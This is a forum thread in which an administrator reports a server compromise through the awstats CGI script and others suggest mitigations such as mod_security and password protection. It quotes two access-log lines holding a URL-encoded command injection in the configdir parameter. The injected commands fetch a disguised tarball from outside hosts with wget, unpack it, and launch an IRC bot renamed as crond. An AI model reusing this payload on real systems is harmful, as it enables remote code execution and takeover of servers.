I think i got hacked ;-(

[McQueen]

Hey guys,

I just though I would let you know how my server got compromised. This
even happend after I installed the new version of awstats on Wednesday.
So in short I don't know if it is OK to run awstats as a cgi executable.

These are from my access log:

"GET
/cgi-bin/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
0Slasher%2ehell%2ero%2fbadboy%2etar%2ejpg%3btar%20%2dzxvf%20badboy%2eta
r%2ejpg%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"

"GET
/cgi-bin/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20Slasher%2eidi
lis%2ero%2fbadboy%2etar%2ejpg%3btar%20%2dzxvf%20badboy%2etar%2ejpg%3bcd%20
psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
2500 HTTP/1.1" 200 634 "-" "-"


-cs

 

[Duboux]

We got hacked too, 2 years ago, due to awstats..

Shame it's still unsafe =/

Perhaps mod_security will help you prevent this type of url-abuse

 

[floyd]

So in short I don't know if it is OK to run awstats as a cgi executable.

Then you don't run it at all. You can run it if its not executable.

One way to make it safe (safer) is to require it to be in a password protected directory.

 

[Duboux]

password protected is standard with the latest version, right ?
Or does that come with the plugin

 

[floyd]

I think users can choose to password protect or not. I think you should scan to make sure they are password protected.